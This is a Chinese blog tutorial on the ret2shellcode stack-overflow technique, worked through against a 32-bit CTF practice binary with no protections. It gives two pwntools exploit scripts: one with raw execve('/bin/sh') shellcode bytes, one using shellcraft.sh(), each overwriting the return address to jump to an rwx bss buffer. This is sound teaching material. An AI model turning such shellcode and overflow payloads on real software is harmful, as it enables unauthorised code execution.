基本ROP(二)

本文介绍了一种利用ret2shellcode技术绕过二进制保护机制的方法。通过实际案例展示了如何利用程序的bss段权限,将shellcode置于栈上并控制程序执行,最终获取目标系统的shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

每日一结【第2天】

这年头果然不能随便立flag,随便有点啥事都能给耽误了,今天继续

二进制保护机制:http://www.mamicode.com/info-detail-1990426.html

ret2shellcode

原理:
ret2shellcode需要我们控制程序执行shellcode代码。而所谓的shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode都需要我们自己去填充。这其实是另外一种典型的利用的方法,即此时我们需要自己去填充一些可执行的代码。而在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行shellcode,需要对应的binary文件没有开启NX保护。

样例:ret2shellcode

第一步,先运行一下程序,顺道查看一下保护机制(偷个懒,不放那么多图了)
我们可以看到这个程序也是让输入一串字符,是32位程序,而且没有开启任何保护
这里写图片描述

然后扔进IDA里看一下,和上一题一样,存在栈溢出漏洞,我们双击buf2就会来到bss段,地址是0x0804A080(关于bss段戳这里
这里写图片描述

这里写图片描述

OK,现在大概已经了解一些了,使用上一次的方法调试一波,然后可得知输入的第一个字节距离ebp108个字节,距离ret地址112个字节
这里写图片描述

这个时候本次的重点来啦!!!

我们使用vmmap指令查看一下程序的内存,非(yi)常(liao)意(zhi)外(zhong)的发现,这个程序的bss段具有rwx权限,这就很令人开心啦,我们这次可以使用和上次不一样的方法
这里写图片描述
这一次,因为程序的bss段的权限足够,所以我们可以把shellcode直接布置到栈上,然后控制程序去执行

exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()

执行结果:
这里写图片描述

这里还有一份exp,不过不知道为啥我这边执行总是出错,大家有兴趣可以看一下
exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值